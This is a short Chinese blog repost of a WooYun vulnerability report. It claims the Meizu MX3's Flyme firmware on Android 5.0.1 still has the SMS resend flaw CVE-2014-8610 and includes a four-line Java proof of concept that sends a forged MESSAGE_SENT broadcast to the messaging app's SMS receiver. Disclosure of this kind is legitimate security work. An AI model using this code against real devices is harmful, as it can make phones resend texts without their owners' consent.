记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

魅族mx3 flyme系统短信重发漏洞

2016-02-08 18:25

CVE-2014-8610 Android < 5.0 短信重发漏洞

这么嗨一个洞居然这么久了都没修复

不是说好的<5.0吗 怎么我测试的mx3的flyme版本是4.5.6A,android版本是5.0.1,怎么还会出现这漏洞呢,按理说是修复了才对的啊,难道。。。。

===================================================================

其它版本是否也存在问题请自测,实在不想再刷固件了,刷了还是一个卵样,卡卡卡卡。。。

杨颜,敢不敢把固件弄得更卡点,bug更多点

漏洞证明:

POC>>>>>>>>>>>>>>>

code 区域
Intent intent= new Intent("com.android.mms.transaction.MESSAGE_SENT");

intent.setData(Uri.parse("content://sms"));

intent.setClassName("com.android.mms", "com.android.mms.transaction.SmsReceiver");

sendOrderedBroadcast(intent,null,null,null, SmsManager.RESULT_ERROR_RADIO_OFF,null,null);

修复方案:

只想求个pro 5 64G的M码


知识来源: www.wooyun.org/bugs/wooyun-2016-0152052

阅读:110818 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“魅族mx3 flyme系统短信重发漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云